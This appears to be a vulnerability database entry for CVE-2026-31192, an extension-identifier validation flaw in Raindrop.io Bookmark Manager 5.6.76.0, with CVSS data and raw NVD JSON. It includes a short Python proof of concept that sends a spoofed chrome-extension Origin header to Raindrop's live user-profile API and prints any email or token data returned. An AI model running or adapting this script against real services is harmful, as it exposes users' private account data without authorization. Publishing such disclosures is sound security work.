Security Vulnerability Report
中文
CVE-2026-31192 CVSS 6.5 MEDIUM

CVE-2026-31192

Published: 2026-04-22 14:16:36
Last Modified: 2026-05-12 20:14:48

Description

Insufficient validation of Chrome extension identifiers in Raindrop.io Bookmark Manager Web App 5.6.76.0 allows attackers to obtain sensitive user data via a crafted request.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:raindrop:raindrop:5.6.76.0:*:*:*:*:chrome:*:* - VULNERABLE
Raindrop.io Bookmark Manager Web App 5.6.76.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_vulnerability(target_url): # Simulate a request with a crafted Chrome Extension Identifier/Origin headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", "Origin": "chrome-extension://abcdefghijklmnop", # Malicious or unvalidated ID "Referer": "chrome-extension://abcdefghijklmnop/" } try: # Send request to the target endpoint response = requests.get(target_url, headers=headers, timeout=10) # Check if sensitive data is exposed in the response if response.status_code == 200 and ("email" in response.text or "token" in response.text): print("[+] Potential Vulnerability Detected!") print("[+] Response Content:") print(response.text[:500]) # Print snippet of data else: print("[-] Vulnerability not detected or data not exposed.") except Exception as e: print(f"[!] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual vulnerable endpoint target = "https://api.raindrop.io/rest/v1/user/profile" check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-31192", "sourceIdentifier": "[email protected]", "published": "2026-04-22T14:16:36.420", "lastModified": "2026-05-12T20:14:47.603", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Insufficient validation of Chrome extension identifiers in Raindrop.io Bookmark Manager Web App 5.6.76.0 allows attackers to obtain sensitive user data via a crafted request."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:raindrop:raindrop:5.6.76.0:*:*:*:*:chrome:*:*", "matchCriteriaId": "C204428A-503A-4549-A55F-C5CF406FEA00"}]}]}], "references": [{"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Guides/CORS", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Reference/Headers/Origin", "source": "[email protected]", "tags": ["Technical Description"]}, {"url": "https://github.com/incoggeek/vulnerability-research/tree/master/CVE-2026-31192", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://support.google.com/chrome_webstore/answer/2664769?hl=en", "source": "[email protected]", "tags": ["Not Applicable"]}]}}